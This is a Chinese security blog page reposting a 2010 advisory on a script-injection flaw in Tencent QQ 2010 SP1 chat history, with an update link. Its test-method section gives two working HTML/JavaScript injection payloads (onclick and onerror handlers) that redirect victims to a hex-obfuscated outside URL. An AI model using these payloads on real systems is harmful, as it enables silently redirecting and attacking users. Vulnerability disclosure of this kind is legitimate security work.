蓝盟诗人[LUC]蓝客联盟

设为首页
加入收藏
订阅本站
热门搜索:WordPress 插件 Win7 技巧 PHP SEO 主题 漏洞仓库 漏洞 dedeCMS DNF webshell 脚本 数据库 SESSION
您的位置: 首页 > 新闻 > 互联网新闻 > 正文

腾讯QQ 2010SP1消息记录远程代码注入漏洞及修复

2010-10-28 21:46 作者: 来源: 本站 浏览: 1,897 views 我要评论 字号:

影响版本:
Tencent QQ 2010 SP1漏洞描述:
腾讯QQ是一款在中国非常广泛使用的即时聊天工具。
腾讯QQ 2010 SP1在处理消息记录时,没有对会话消息中的Javascript和Html标签进行正确转义,攻击者可以发送恶意消息注入脚本代码并执行。

<*参考
TGL
*>
测试方法:
<input onclick="window.location=' x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d'"/>
<img src='tetet' onerror="window.location='x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d'"/>SEBUG安全建议:
最新版本的腾讯QQ已经修复此漏洞,建议用户下载使用:
http://im.qq.com/qq/dlqq.shtml

标签: ,
本文链接: 腾讯QQ 2010SP1消息记录远程代码注入漏洞及修复
版权所有: 非特殊声明均为本站原创文章,转载请注明出处:诗人博客 www.BlueNoob.com | 蓝色菜鸟网
订阅更新: 您可以通过RSS订阅我们的内容更新

扫描二维码手机访问

腾讯QQ 2010SP1消息记录远程代码注入漏洞及修复

相关阅读

随机推荐

打印
分享到:
复制链接

发表评论

*

* (保密)


申请头像

Ctrl+Enter 快捷回复

会员登录关闭

记住我 忘记密码

注册会员关闭

小提示: 您的密码会通过填写的"电子邮箱"发送给您.

Copyright © 2010-2020 诗人博客 www.BlueNoob.com | 蓝色菜鸟网 All Rights Reserved.

百度Sitemap Google Sitemap

110 | 0.4509969